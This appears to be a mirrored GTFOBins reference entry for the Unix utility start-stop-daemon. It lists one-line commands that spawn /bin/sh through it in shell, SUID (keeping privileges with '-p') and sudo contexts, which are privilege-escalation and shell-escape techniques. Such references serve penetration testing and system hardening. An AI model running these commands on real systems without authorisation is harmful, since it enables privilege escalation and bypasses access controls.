1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/start-stop-daemon.md
2018-11-05 16:41:04 +01:00

10 lines
222 B
Markdown

---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---